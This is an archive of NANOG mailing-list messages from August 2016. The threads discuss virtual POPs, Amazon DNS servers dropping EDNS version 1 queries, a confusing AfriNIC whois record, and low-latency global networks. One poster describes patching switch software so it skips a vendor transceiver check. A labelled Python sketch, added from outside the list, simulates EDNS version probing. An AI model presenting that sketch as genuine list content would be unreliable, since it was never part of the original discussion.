> > work.
> >
> > I'm writing this post to make somebody who considers buying their
> switches
> > be aware of what they'd get. Just buy Juniper instead.
> >
> >
> >
> > Stanislaw wrote at 2016-08-17 23:25:
> >
> >> Hi Tim,
> >>
> >> Thanks for your expressive answer. Will try it :)
> >>
> >> Tim Jackson wrote at 2016-08-17 22:57:
> >>
> >> I'd suggest bitching and moaning at your account team & support until
> >>> they give you the key to unlock them..
> >>>
> >>> --
> >>> Tim
> >>>
> >>> On Wed, Aug 17, 2016 at 2:50 PM, Stanislaw wrote:
> >>>
> >>> Hi all,
> >>>> Is there a way for unlocking off-brand transceivers usage on Arista
> >>>> switches?
> >>>>
> >>>> I've got an Arista 7050QX switch with 4.14 EOS version. Then it has
> >>>> been found out that Arista switches seem to not have possibility to
> unlock
> >>>> off-brand xceivers usage (by some service command or so).
> >>>>
> >>>> I've patched /usr/lib/python2.7/site-packages/XcvrAgent.py, made the
> >>>> checking function bypass the actual check and it helped: ports are
> not in
> >>>> errdisable state anymore. But despite of xceivers are detected
> correctly,
> >>>> links aren't coming up (they are in notconnect state).
> >>>>
> >>>> If anyone possibly have does have a sacred knowledge of bringing
> >>>> off-branded transceivers to life on Arista switches, your help'd be
> very
> >>>> appreciated. Thanks.
> >>>>
> >>>
>

From sunyucong at gmail.com  Tue Aug 23 22:31:11 2016
From: sunyucong at gmail.com (Yucong Sun)
Date: Tue, 23 Aug 2016 22:31:11 +0000
Subject: What's the meaning of virtual POP ?
Message-ID:

Hi,

I came across the idea of the virtual POP, but the website for them have way too much jargon to me[1][2][3], can someone explain it like I'm five (:-D)?

Specifically, my question is:

1. Is virtual POP basically a L2VPN? That is, the provider will provide a port at site A, that is somehow connected to LAN of site B? What's difference with vpop and layer 2 transport then?

2. Do such vPOP have guaranteed latency/bandwidth?

3. Is that really useful? If I'm already buying transit bandwidth/announce my blocks from provider, the site B peers is already going to send traffic through provider's backbone to site A, then what's the difference?

Thanks!

example
1. http://www.ixreach.com/services/colocation/virtual-pop/
2. http://www.interoute.com/network-box-virtual-pop-vpop
3. https://www.linx.net/join-linx/vpop

From bill at herrin.us  Tue Aug 23 22:46:21 2016
From: bill at herrin.us (William Herrin)
Date: Tue, 23 Aug 2016 18:46:21 -0400
Subject: What's the meaning of virtual POP ?
In-Reply-To:
References:
Message-ID:

On Tue, Aug 23, 2016 at 6:31 PM, Yucong Sun wrote:
> I came across the idea of the virtual POP, but the website for them have
> way too much jargon to me[1][2][3], can someone explain it like I'm five
> (:-D)?

A virtual Point Of Presence means that you provide services at a location via someone else's facilities.

The classic example was extending a PRI for dialup modems inside a particular local calling area via a point-to-point T1 back to your modem bank somewhere else that would have been a long distance call for those customers. If you put a modem bank in their local calling area, it's a POP. If you extend the circuit from their local calling area back to your modem bank elsewhere, it's a virtual POP.

Modern examples of virtual POPs are much fancier but it's the same basic idea.

> 1. Is virtual POP basically a L2VPN?

It can be. Depends on what service you're extending from the "virtual" location.

> 2. Do such vPOP have guaranteed latency/bandwidth?

Depends on what you're extending and how.

> 3. Is that really useful?

It can be. It can let you dip your toes in a market without a large up-front investment in equipment and backhaul.

Regards,
Bill Herrin

--
William Herrin ................ herrin at dirtside.com bill at herrin.us
Owner, Dirtside Systems ......... Web:

From sunyucong at gmail.com  Tue Aug 23 23:20:05 2016
From: sunyucong at gmail.com (Yucong Sun)
Date: Tue, 23 Aug 2016 23:20:05 +0000
Subject: What's the meaning of virtual POP ?
In-Reply-To:
References:
Message-ID:

Thanks for the explanation. I understand on layer 2 or like William points out (on anything other than IP) it makes total sense.

However on layer 3, with existing transit bandwidth with said provider it would be redundant. (Assume the one you wanted to peer with at site b is already peering with your provider).

Cheers.

On Tue, Aug 23, 2016, 15:51 Rod Beck wrote:

> Yes, except it is done via Switched Ethernet and VLANs. The idea behind
> virtual peering. Your gear is in Amsterdam and someone gives you VLANs to
> LINX.
>
>
> - R.
>
>
> ------------------------------
> *From:* NANOG on behalf of William Herrin <
> bill at herrin.us>
> *Sent:* Wednesday, August 24, 2016 12:46 AM
> *To:* Yucong Sun
> *Cc:* NANOG
>
> *Subject:* Re: What's the meaning of virtual POP ?
> On Tue, Aug 23, 2016 at 6:31 PM, Yucong Sun wrote:
> > I came across the idea of the virtual POP, but the website for them
> have
> > way too much jargon to me[1][2][3], can someone explain it like I'm five
> > (:-D)?
>
> A virtual Point Of Presence means that you provide services at a
> location via someone else's facilities.
>
> The classic example was extending a PRI for dialup modems inside a
> particular local calling area via a point-to-point T1 back to your
> modem bank somewhere else that would have been a long distance call
> for those customers. If you put a modem bank in their local calling
> area, it's a POP. If you extend the circuit from their local calling
> area back to your modem bank elsewhere, it's a virtual POP.
>
> Modern examples of virtual POPs are much fancier but it's the same basic
> idea.
>
>
> > 1. Is virtual POP basically a L2VPN?
>
> It can be. Depends on what service you're extending from the "virtual"
> location.
>
>
> > 2. Do such vPOP have guaranteed latency/bandwidth?
>
> Depends on what you're extending and how.
>
>
> > 3. Is that really useful?
>
> It can be. It can let you dip your toes in a market without a large
> up-front investment in equipment and backhaul.
>
> Regards,
> Bill Herrin
>
>
> --
> William Herrin ................ herrin at dirtside.com bill at herrin.us
> Owner, Dirtside Systems ......... Web:
> Dirtside Systems
> www.dirtside.com
> Welcome! You are our 370,765 th guest. Dirtside builds ground systems and
> ground system software for the satellite and mobile communications
> industries.
>
>

From marka at isc.org Tue Aug 23 23:37:10 2016
From: marka at isc.org (Mark Andrews)
Date: Wed, 24 Aug 2016 09:37:10 +1000
Subject: Can someone from Amazon please answer.
Message-ID: <20160823233710.8DC3A5206AD7@rock.dv.isc.org>

I'm curious. What are you trying to achieve by blocking EDNS version negotiation? Is it really too hard to return BADVERS to an EDNS query with version != 0 along with the version of EDNS you support in the version field?

Are you deliberately trying to prevent the IETF from deciding to bump the EDNS version in the future?

Do you have firewalls that have this behaviour hard coded?

Do you even test for RFC compliance?

Mark

lostoncampus.com.au. @205.251.195.156 (ns-924.awsdns-51.net.): dns=ok edns=ok edns1=timeout edns@512=ok ednsopt=ok edns1opt=timeout do=ok ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok
lostoncampus.com.au. @205.251.192.78 (ns-78.awsdns-09.com.): dns=ok edns=ok edns1=timeout edns@512=ok ednsopt=ok edns1opt=timeout do=ok ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok
lostoncampus.com.au. @205.251.196.198 (ns-1222.awsdns-24.org.): dns=ok edns=ok edns1=timeout edns@512=ok ednsopt=ok edns1opt=timeout do=ok ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok
lostoncampus.com.au. @205.251.199.20 (ns-1812.awsdns-34.co.uk.): dns=ok edns=ok edns1=timeout edns@512=ok ednsopt=ok edns1opt=timeout do=ok ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok

--
Mark Andrews, ISC
1 Seymour St., Dundas Valley, NSW 2117, Australia
PHONE: +61 2 9871 4742 INTERNET: marka at isc.org

From jared at puck.nether.net Wed Aug 24 00:23:34 2016
From: jared at puck.nether.net (Jared Mauch)
Date: Tue, 23 Aug 2016 20:23:34 -0400
Subject: What's the meaning of virtual POP ?
In-Reply-To:
References:
Message-ID: <8E75804D-0728-450F-A372-EAEE7D89776E@puck.nether.net>

This could be done with an OPS and diverse fibers or a dual transponder type solution or an Ethernet ring amongst other solutions.

It generally means to router geeks that a router isn't there, but some other technology is in use. Often it is a growing market or declining market for the provider.

Jared Mauch

> On Aug 23, 2016, at 7:20 PM, Yucong Sun wrote:
>
> However on layer 3, with existing transit bandwidth with said provider it
> would be redundant. (Assume The one you wanted peer at site b is already
> peering with your provider).

From hannigan at gmail.com Wed Aug 24 03:59:49 2016
From: hannigan at gmail.com (Martin Hannigan)
Date: Tue, 23 Aug 2016 23:59:49 -0400
Subject: Question re: Routing Table Report Was: Re: [pacnog] Weekly Routing Table Report
Message-ID:

Phillip, Geoff, et. al.
[ trimmed dist, please feel free to expand if you think it's proper ]

On Fri, Aug 19, 2016 at 2:01 PM, Routing Analysis Role Account wrote:
>
> Advertised Unallocated Addresses
> --------------------------------
>
> Network            Origin AS  Description
> 23.249.144.0/20    40430      COLO4JAX-AS - colo4jax, LLC, US
> 27.100.7.0/24      56096      UNKNOWN
> 41.73.1.0/24       37004      -Reserved AS-, ZZ
> 41.73.2.0/24       37004      -Reserved AS-, ZZ
> 41.73.3.0/24       37004      -Reserved AS-, ZZ
> 41.73.4.0/24       37004      -Reserved AS-, ZZ
> 41.73.5.0/24       37004      -Reserved AS-, ZZ
> 41.73.6.0/24       37004      -Reserved AS-, ZZ
> 41.73.7.0/24       37004      -Reserved AS-, ZZ
> 41.73.8.0/24       37004      -Reserved AS-, ZZ
>
> Complete listing at http://thyme.rand.apnic.net/current/data-add-IANA
>

I regularly check the report for references to 20940 and I was digging in to these a bit and I noticed something odd:

Comment: AfriNIC - http://www.afrinic.net
Comment: The African & Indian Ocean Internet Registry
Ref: https://whois.arin.net/rest/org/AFRINIC
ReferralServer: whois://whois.afrinic.net
ResourceLink: http://afrinic.net/en/services/whois-query
OrgAbuseHandle: GENER11-ARIN <----
OrgAbuseName: Generic POC
OrgAbusePhone: +230 4666616
OrgAbuseEmail: abusepoc at afrinic.net
OrgAbuseRef: https://whois.arin.net/rest/poc/GENER11-ARIN <---

I followed OrgAbuseRef to ARIN and got this:

"Do not use this information to contact AfriNIC for registration or business purposes."

This registry record is confusing. Can you explain? Sorry, I must've missed this class in Registry 101.

Appreciated, and thanks!

-M<

From marco at paesani.it Wed Aug 24 08:30:24 2016
From: marco at paesani.it (Marco Paesani)
Date: Wed, 24 Aug 2016 10:30:24 +0200
Subject: AS6661 Post LU Contact
Message-ID:

Please contact me off list.
Thanks !

Kind regards,

Marco Paesani

Skype: mpaesani
Mobile: +39 348 6019349
Success depends on the right choice !
Email: marco at paesani.it

From mark.tinka at seacom.mu Wed Aug 24 08:57:42 2016
From: mark.tinka at seacom.mu (Mark Tinka)
Date: Wed, 24 Aug 2016 10:57:42 +0200
Subject: What's the meaning of virtual POP ?
In-Reply-To:
References:
Message-ID: <54595aaa-7f52-1b71-9520-de38be893aaa@seacom.mu>

On 24/Aug/16 01:20, Yucong Sun wrote:

> Thanks for the explanation.
>
> I understand on layer 2 or like William points out (on anything other than
> IP) it makes total sense.
>
> However on layer 3, with existing transit bandwidth with said provider it
> would be redundant. (Assume The one you wanted peer at site b is already
> peering with your provider).

The term "virtual PoP" is more commercial than it is technical.

As William mentioned, you are providing services via someone else's infrastructure. It is between you and that other network to determine how much of their infrastructure you will depend on. But ultimately, the objective is for you to reduce your exposure in what you would consider a new venture that still needs some proofing.

Mark.

From gadit.arqam at gmail.com Wed Aug 24 15:13:56 2016
From: gadit.arqam at gmail.com (Arqam Gadit)
Date: Wed, 24 Aug 2016 20:13:56 +0500
Subject: Managed global low latency network with any to any connectivity
Message-ID:

Hello guys,

I am looking for a global network with:

- lowest possible latency
- lowest possible jitter (packet loss and latency variation)
- lowest possible monetary cost

The few providers I have talked to until now, they all provide a point-to-point low latency link. However, what I am looking for is any-to-any connectivity so I can get from one point to another in least possible time and least possible cost.

Would appreciate if you guys can point me in the right direction.

Thanks!

Arqam

From rod.beck at unitedcablecompany.com Tue Aug 23 22:51:27 2016
From: rod.beck at unitedcablecompany.com (Rod Beck)
Date: Tue, 23 Aug 2016 22:51:27 +0000
Subject: What's the meaning of virtual POP ?
In-Reply-To:
References: ,
Message-ID:

Yes, except it is done via Switched Ethernet and VLANs. The idea behind virtual peering. Your gear is in Amsterdam and someone gives you VLANs to LINX.

- R.

________________________________
From: NANOG on behalf of William Herrin
Sent: Wednesday, August 24, 2016 12:46 AM
To: Yucong Sun
Cc: NANOG
Subject: Re: What's the meaning of virtual POP ?

On Tue, Aug 23, 2016 at 6:31 PM, Yucong Sun wrote:
> I came across the idea of the virtual POP , but the website for them have
> way too much jargon to me[1][2][3], can someone explain it like i'm five
> (:-D)?

A virtual Point Of Presence means that you provide services at a location via someone else's facilities.

The classic example was extending a PRI for dialup modems inside a particular local calling area via a point-to-point T1 back to your modem bank somewhere else that would have been a long distance call for those customers. If you put a modem bank in their local calling area, it's a POP. If you extend the circuit from their local calling area back to your modem bank elsewhere, it's a virtual POP.

Modern examples of virtual POPs are much fancier but it's the same basic idea.

> 1. Is virtual POP basically a L2VPN?

It can be. Depends on what service you're extending from the "virtual" location.

> 2. Do such vPOP have guaranteed latency/bandwidth?

Depends on what you're extending and how.

> 3. Is that really useful?

It can be. It can let you dip your toes in a market without a large up-front investment in equipment and backhaul.

Regards,
Bill Herrin

--
William Herrin ................ herrin at dirtside.com bill at herrin.us
Owner, Dirtside Systems ......... Web:
Dirtside Systems
www.dirtside.com
Welcome! You are our 370,765 th guest. Dirtside builds ground systems and ground system software for the satellite and mobile communications industries.
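Added example, not part of any list message and not ISC's test tool: Mark Andrews's message earlier in this archive asks for BADVERS with the supported version in the version field, and this Python sketch shows that exchange at the wire level (RFC 6891) next to a model of the drop behaviour his `edns1=timeout` results report. The query name, the function names and the classifier labels other than `ok` and `timeout` are assumptions of this example.

```python
import struct

TYPE_OPT = 41           # OPT pseudo-RR type (RFC 6891)
BADVERS = 16            # extended RCODE; its high 8 bits travel in the OPT TTL
SUPPORTED_VERSION = 0   # highest EDNS version the toy responder implements


def encode_name(name):
    """Encode a domain name as uncompressed DNS labels."""
    out = b""
    for label in name.rstrip(".").split("."):
        if label:
            raw = label.encode("ascii")
            out += bytes([len(raw)]) + raw
    return out + b"\x00"


def opt_rr(udp_size, ext_rcode, version):
    """OPT RR: root name, TYPE=41, CLASS=UDP size, TTL=ext-rcode|version|flags."""
    return b"\x00" + struct.pack("!HHBBHH", TYPE_OPT, udp_size, ext_rcode, version, 0, 0)


def build_query(qname, edns_version, msg_id=0x1A2B):
    """Build an SOA query whose OPT RR advertises edns_version."""
    header = struct.pack("!HHHHHH", msg_id, 0x0000, 1, 0, 0, 1)
    question = encode_name(qname) + struct.pack("!HH", 6, 1)  # QTYPE=SOA, QCLASS=IN
    return header + question + opt_rr(4096, 0, edns_version)


def skip_name(msg, off):
    """Return the offset just past the name starting at off."""
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:      # compression pointer ends the name
            return off + 2
        off += 1
        if length == 0:
            return off
        off += length


def question_end(msg):
    """Offset of the first byte after the question section."""
    off = 12
    for _ in range(struct.unpack("!H", msg[4:6])[0]):
        off = skip_name(msg, off) + 4
    return off


def find_opt(msg):
    """Return the decoded OPT RR of a message, or None if it has none."""
    an, ns, ar = struct.unpack("!HHH", msg[6:12])
    off = question_end(msg)
    for _ in range(an + ns + ar):
        off = skip_name(msg, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10 + rdlen
        if rtype == TYPE_OPT:
            return {"udp_size": rclass, "ext_rcode": ttl >> 24,
                    "version": (ttl >> 16) & 0xFF, "flags": ttl & 0xFFFF}
    return None


def full_rcode(msg):
    """Combine the 4-bit header RCODE with the 8 extended bits from the OPT RR."""
    low = struct.unpack("!H", msg[2:4])[0] & 0x000F
    opt = find_opt(msg)
    return ((opt["ext_rcode"] << 4) | low) if opt else low


def respond(query):
    """Toy version-0-only responder: BADVERS plus its own version for newer queries."""
    msg_id, flags, qd = struct.unpack("!HHH", query[:6])
    opt = find_opt(query)
    rcode = BADVERS if opt and opt["version"] > SUPPORTED_VERSION else 0
    resp_flags = 0x8000 | (flags & 0x0100) | (rcode & 0xF)   # QR=1, copy RD
    header = struct.pack("!HHHHHH", msg_id, resp_flags, qd, 0, 0, 1 if opt else 0)
    body = header + query[12:question_end(query)]
    if opt:
        body += opt_rr(1232, rcode >> 4, SUPPORTED_VERSION)
    return body


def drop_unknown_versions(query):
    """Model of the behaviour the page reports: version != 0 gets no reply at all."""
    opt = find_opt(query)
    if opt and opt["version"] != 0:
        return None                  # the client only ever sees a timeout
    return respond(query)


def classify_edns1(response, probe_version=1):
    """Grade the reply to an EDNS version probe; None stands for a timeout."""
    if response is None:
        return "timeout"
    opt = find_opt(response)
    if opt is None:
        return "noopt"               # no OPT RR, so no version is advertised
    if full_rcode(response) != BADVERS:
        return "no-badvers"          # answered as if it implemented the version
    if opt["version"] >= probe_version:
        return "bad-version-field"   # BADVERS must carry a version it supports
    return "ok"


if __name__ == "__main__":
    probe = build_query("zone.example", edns_version=1)   # constructed name
    print("compliant:", classify_edns1(respond(probe)))
    print("dropping: ", classify_edns1(drop_unknown_versions(probe)))
```

Because BADVERS is 16, the 4-bit RCODE in the header stays 0 and the error is visible only in the OPT RR, which is why a client cannot distinguish a filtered version 1 query from packet loss.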
From sryan at arbor.net Wed Aug 24 15:20:09 2016
From: sryan at arbor.net (Ryan, Spencer)
Date: Wed, 24 Aug 2016 15:20:09 +0000
Subject: Managed global low latency network with any to any connectivity
In-Reply-To:
References:
Message-ID:

AT&T's AVPN product (Layer 3 VPN/"MPLS") does any-any routing and constantly changes L3 hops for the best pathing.

I've used the service at a few jobs and the product itself is quite good. Dealing with them for things like MACD's can be...frustrating.

We've never had a location they couldn't service either directly or via another last mile carrier.

Spencer Ryan | Senior Systems Administrator | sryan at arbor.net
Arbor Networks
+1.734.794.5033 (d) | +1.734.846.2053 (m)
www.arbornetworks.com

________________________________
From: NANOG on behalf of Arqam Gadit
Sent: Wednesday, August 24, 2016 11:13:56 AM
To: nanog at nanog.org
Subject: Managed global low latency network with any to any connectivity

Hello guys,

I am looking for a global network with:

- lowest possible latency
- lowest possible jitter (packet loss and latency variation)
- lowest possible monetary cost

The few providers I have talked to until now, they all provide a point-to-point low latency link. However, what I am looking for is any-to-any connectivity so I can get from one point to another in least possible time and least possible cost.

Would appreciate if you guys can point me in the right direction.

Thanks!
Arqam

From swmike at swm.pp.se Wed Aug 24 15:22:12 2016
From: swmike at swm.pp.se (Mikael Abrahamsson)
Date: Wed, 24 Aug 2016 17:22:12 +0200 (CEST)
Subject: Managed global low latency network with any to any connectivity
In-Reply-To:
References:
Message-ID:

On Wed, 24 Aug 2016, Arqam Gadit wrote:

> Hello guys,
>
> I am looking for a global network with:
>
> - lowest possible latency
> - lowest possible jitter (packet loss and latency variation)
> - lowest possible monetary cost
>
> The few providers I have talked to until now, they all provide a
> point-to-point low latency link. However, what I am looking for is
> any-to-any connectivity so I can get from one point to another in least
> possible time and least possible cost.
>
> Would appreciate if you guys can point me in the right direction.

The right direction is to decide what is most important to you. There is no network in the world that provides all of your criteria at once.

Some people are paying really good money for low latency/PDV. Some other people are paying little money, but in return get low latency and PDV.

So what's most important to you? Money or network characteristics?

--
Mikael Abrahamsson email: swmike at swm.pp.se

From rod.beck at unitedcablecompany.com Wed Aug 24 15:36:13 2016
From: rod.beck at unitedcablecompany.com (Rod Beck)
Date: Wed, 24 Aug 2016 15:36:13 +0000
Subject: Managed global low latency network with any to any connectivity
In-Reply-To:
References:
Message-ID:

So you want point-to-multipoint which means Switched Ethernet. But ultra latency traders don't want the extra latency associated with Switched Ethernet. And they dominate the demand for ultra-low latency.

Regards,

Roderick.
United Cable Company

________________________________
From: NANOG on behalf of Arqam Gadit
Sent: Wednesday, August 24, 2016 5:13 PM
To: nanog at nanog.org
Subject: Managed global low latency network with any to any connectivity

Hello guys,

I am looking for a global network with:

- lowest possible latency
- lowest possible jitter (packet loss and latency variation)
- lowest possible monetary cost

The few providers I have talked to until now, they all provide a point-to-point low latency link. However, what I am looking for is any-to-any connectivity so I can get from one point to another in least possible time and least possible cost.

Would appreciate if you guys can point me in the right direction.

Thanks!

Arqam

From rod.beck at unitedcablecompany.com Wed Aug 24 15:45:05 2016
From: rod.beck at unitedcablecompany.com (Rod Beck)
Date: Wed, 24 Aug 2016 15:45:05 +0000
Subject: Managed global low latency network with any to any connectivity
In-Reply-To:
References: ,
Message-ID:

There are standard routes and there are low latency routes that serve mostly traders. The latter charge a big premium. He said the lowest possible latency. That is a specialty market where the SLAs are in microseconds, not milliseconds. Many carriers have a division for ultra low latency. Hibernia Atlantic built express which is just used by financial traders. No one else can afford it. And since low latency is the name of the game, it means waves or SDH or SONET. Not Ethernet switching.

Regards,

Roderick.

________________________________
From: NANOG on behalf of Ryan, Spencer
Sent: Wednesday, August 24, 2016 5:20 PM
To: Arqam Gadit; nanog at nanog.org
Subject: Re: Managed global low latency network with any to any connectivity

AT&T's AVPN product (Layer 3 VPN/"MPLS") does any-any routing and constantly changes L3 hops for the best pathing.

I've used the service at a few jobs and the product itself is quite good. Dealing with them for things like MACD's can be...frustrating.
We've never had a location they couldn't service either directly or via another last mile carrier.

Spencer Ryan | Senior Systems Administrator | sryan at arbor.net
Arbor Networks
+1.734.794.5033 (d) | +1.734.846.2053 (m)
www.arbornetworks.com

________________________________
From: NANOG on behalf of Arqam Gadit
Sent: Wednesday, August 24, 2016 11:13:56 AM
To: nanog at nanog.org
Subject: Managed global low latency network with any to any connectivity

Hello guys,

I am looking for a global network with:

- lowest possible latency
- lowest possible jitter (packet loss and latency variation)
- lowest possible monetary cost

The few providers I have talked to until now, they all provide a point-to-point low latency link. However, what I am looking for is any-to-any connectivity so I can get from one point to another in least possible time and least possible cost.

Would appreciate if you guys can point me in the right direction.

Thanks!

Arqam

From SNaslund at medline.com Wed Aug 24 15:48:18 2016
From: SNaslund at medline.com (Naslund, Steve)
Date: Wed, 24 Aug 2016 15:48:18 +0000
Subject: Managed global low latency network with any to any connectivity
In-Reply-To:
References:
Message-ID: <9578293AE169674F9A048B2BC9A081B401E6693D68@MUNPRDMBXA1.medline.com>

This is kind of the holy grail of networks you are looking for. You have to be a lot more specific than global to really shop this. As far as I know (and I have looked a lot), there is not one network that can get you to most countries with the best performance. For example, China is a particular case of a limited number of carriers delivering the last mile. There are a lot of countries that also have nationalized monopolies that can't be avoided. Best idea is to put together an RFP listing the countries you are interested in with the SLA you want. Various providers are teamed with other providers to provide a complete solution but there will definitely be carriers stronger in certain regions.
If you are talking about any-to-any connectivity on a global basis you are looking at an MPLS VPN type of network in order to deal with last mile transport over various providers. In my experience that is about the only way to get a real global any-to-any private network.

Also, the old saying: "cheap, reliable, fast; pick any two" really applies in this case.

Steven Naslund
Chicago IL

From: NANOG on behalf of Arqam Gadit
Sent: Wednesday, August 24, 2016 5:13 PM
To: nanog at nanog.org
Subject: Managed global low latency network with any to any connectivity

Hello guys,

I am looking for a global network with:

- lowest possible latency
- lowest possible jitter (packet loss and latency variation)
- lowest possible monetary cost

The few providers I have talked to until now, they all provide a point-to-point low latency link. However, what I am looking for is any-to-any connectivity so I can get from one point to another in least possible time and least possible cost.

Would appreciate if you guys can point me in the right direction.

Thanks!

Arqam

From SNaslund at medline.com Wed Aug 24 16:01:22 2016
From: SNaslund at medline.com (Naslund, Steve)
Date: Wed, 24 Aug 2016 16:01:22 +0000
Subject: Managed global low latency network with any to any connectivity
In-Reply-To:
References: ,
Message-ID: <9578293AE169674F9A048B2BC9A081B401E6693D8B@MUNPRDMBXA1.medline.com>

The real issue in the request is that this person is looking for any-to-any connectivity which will require either a single L2 switching domain or a L3 routing domain. While waves, SDH, and SONET might be your layer one transport there are two major factors that are going to affect latency and jitter the most.

1. Geography - Any point to any point has a minimum latency due to simple mileage/medium constraints. You cannot possibly go any faster than the velocity of propagation over the media of your choice.
For example, lowest latency at layer 1 would probably be P2P microwave (which has a faster velocity of propagation than light over fiber) but that would not be an effective way to cross the Pacific ocean.

2. Routing/Switching queuing latency - If you want real any to any connectivity you need routing or switching logic which takes time. For example, lowest latency at layer 1 would probably be P2P microwave (which has a faster velocity of propagation than fiber) but that would not be an effective way to cross the Pacific ocean.

If you are doing an MPLS VPN architecture within the US, your routing/switching latency are probably going to be more significant than the layer one technology but when you go transoceanic your layer 1 latency becomes more significant. The differences in electrical, free RF or optical (like microwave), and optical over fiber will vary by something like 30-40% of the speed of light over the mileage of the link. The routing/switching of an any-to-any architecture will probably dwarf most of the differences in media.

Steven Naslund
Chicago IL

-----Original Message-----
From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Rod Beck
Sent: Wednesday, August 24, 2016 10:45 AM
To: Ryan, Spencer; Arqam Gadit; nanog at nanog.org
Subject: Re: Managed global low latency network with any to any connectivity

There are standard routes and there are low latency routes that serve mostly traders. The latter charge a big premium. He said the lowest possible latency. That is a specialty market where the SLAs are in microseconds, not milliseconds. Many carriers have a division for ultra low latency. Hibernia Atlantic built express which is just used by financial traders. No one else can afford it. And since low latency is the name of the game, it means waves or SDH or SONET. Not Ethernet switching.

Regards,

Roderick.
From craetdave at gmail.com Wed Aug 24 17:27:52 2016
From: craetdave at gmail.com (Dave Cohen)
Date: Wed, 24 Aug 2016 13:27:52 -0400
Subject: What's the meaning of virtual POP ?
In-Reply-To:
References:
Message-ID: <4CB800FD-3015-49E7-9C9A-FBF88328846E@gmail.com>

The key is really that it could mean different things for different providers, although I would agree that the gist is that the location is enabled to look and feel like a POP without the provider installing the full complement of requisite hardware.

A provider I worked at in the past, for example, defined a virtual POP as a non-POP location at which POP pricing was offered - the actual method of delivery there being both irrelevant to it being defined that way and unimportant to the concept as a whole. It let the company be price-competitive with others that may have made more extensive investments in hardware at higher-demand locations, and it was purely based on a business justification. There was no specific technical definition (although in reality we were transparent with our customers about methodology anyway) - this contrasts with other providers that are clearly using it in a way that does define a technical approach. It's just an approach specific to that provider.

> On Aug 23, 2016, at 6:51 PM, Rod Beck wrote:
>
> Yes, except it is done via Switched Ethernet and VLANs. The idea behind virtual peering. Your gear is in Amsterdam and someone gives you VLANs to LINX.
>
>
> - R.
>
>
> ________________________________
> From: NANOG on behalf of William Herrin
> Sent: Wednesday, August 24, 2016 12:46 AM
> To: Yucong Sun
> Cc: NANOG
> Subject: Re: What's the meaning of virtual POP ?
>
>> On Tue, Aug 23, 2016 at 6:31 PM, Yucong Sun wrote:
>> I came across the idea of the virtual POP , but the website for them have
>> way too much jargon to me[1][2][3], can someone explain it like i'm five
>> (:-D)?
>
> A virtual Point Of Presence means that you provide services at a
> location via someone else's facilities.
>
> The classic example was extending a PRI for dialup modems inside a
> particular local calling area via a point-to-point T1 back to your
> modem bank somewhere else that would have been a long distance call
> for those customers. If you put a modem bank in their local calling
> area, it's a POP. If you extend the circuit from their local calling
> area back to your modem bank elsewhere, it's a virtual POP.
>
> Modern examples of virtual POPs are much fancier but it's the same basic idea.
>
>
>> 1. Is virtual POP basically a L2VPN?
>
> It can be. Depends on what service you're extending from the "virtual" location.
>
>
>> 2. Do such vPOP have guaranteed latency/bandwidth?
>
> Depends on what you're extending and how.
>
>
>> 3. Is that really useful?
>
> It can be. It can let you dip your toes in a market without a large
> up-front investment in equipment and backhaul.
>
> Regards,
> Bill Herrin
>
>
> --
> William Herrin ................ herrin at dirtside.com bill at herrin.us
> Owner, Dirtside Systems ......... Web:
> Dirtside Systems
> www.dirtside.com
> Welcome! You are our 370,765 th guest. Dirtside builds ground systems and ground system software for the satellite and mobile communications industries.
>
>

From volists at staff.velocityonline.net Wed Aug 24 18:46:30 2016
From: volists at staff.velocityonline.net (Velocity Lists)
Date: Wed, 24 Aug 2016 14:46:30 -0400
Subject: XO routing issue?
Message-ID:

I am looking for an XO contact, I appear to be having a routing issue with my traffic going through their network.
Velocity Online
850-205-4638

From gadit.arqam at gmail.com Wed Aug 24 19:34:01 2016
From: gadit.arqam at gmail.com (Arqam Gadit)
Date: Thu, 25 Aug 2016 00:34:01 +0500
Subject: Managed global low latency network with any to any connectivity
In-Reply-To:
References:
Message-ID:

Thanks for the input everyone :)

@Mikael, Roderick, Unlike HFT and financial markets, the applications we have to support are not microsecond-sensitive. In fact, a +-10ms difference from 'least possible' is acceptable provided that the connection is stable. So basically I am looking for most cost-effective ways to achieve that using existing products/services.

@Ryan, I'll get in touch with AT&T guys.

Thanks!

Arqam

On Wed, Aug 24, 2016 at 8:45 PM, Rod Beck wrote:

> There are standard routes and there are low latency routes that serve
> mostly traders. The latter charge a big premium. He said the lowest
> possible latency. That is a specialty market where the SLAs are in
> microseconds, not milliseconds. Many carriers have a division for ultra low
> latency. Hibernia Atlantic built express which is just used by financial
> traders. No one else can afford it. And since low latency is the name of
> the game, it means waves or SDH or SONET. Not Ethernet switching.
>
>
> Regards,
>
>
> Roderick.
>
>
> ------------------------------
> *From:* NANOG on behalf of Ryan, Spencer <
> sryan at arbor.net>
> *Sent:* Wednesday, August 24, 2016 5:20 PM
> *To:* Arqam Gadit; nanog at nanog.org
> *Subject:* Re: Managed global low latency network with any to any
> connectivity
>
> AT&T's AVPN product (Layer 3 VPN/"MPLS") does any-any routing and
> constantly changes L3 hops for the best pathing.
>
>
> I've used the service at a few jobs and the product itself is quite good.
> Dealing with them for things like MACD's can be...frustrating.
>
>
> We've never had a location they couldn't service either directly or via
> another last mile carrier.
>
>
> Spencer Ryan | Senior Systems Administrator | sryan at arbor.net<
> mailto:sryan at arbor.net >
> Arbor Networks
> +1.734.794.5033 (d) | +1.734.846.2053 (m)
> www.arbornetworks.com
>
>
> ________________________________
> From: NANOG on behalf of Arqam Gadit <
> gadit.arqam at gmail.com>
> Sent: Wednesday, August 24, 2016 11:13:56 AM
> To: nanog at nanog.org
> Subject: Managed global low latency network with any to any connectivity
>
> Hello guys,
>
> I am looking for a global network with:
>
> - lowest possible latency
> - lowest possible jitter (packet loss and latency variation)
> - lowest possible monetary cost
>
> The few providers I have talked to until now, they all provide a
> point-to-point low latency link. However, what I am looking for is
> any-to-any connectivity so I can get from one point to another in least
> possible time and least possible cost.
>
> Would appreciate if you guys can point me in the right direction.
>
> Thanks!
>
> Arqam
>

From me at anuragbhatia.com Wed Aug 24 22:20:13 2016
From: me at anuragbhatia.com (Anurag Bhatia)
Date: Wed, 24 Aug 2016 22:20:13 +0000
Subject: Cisco Nexus vPC-VOIP Issues
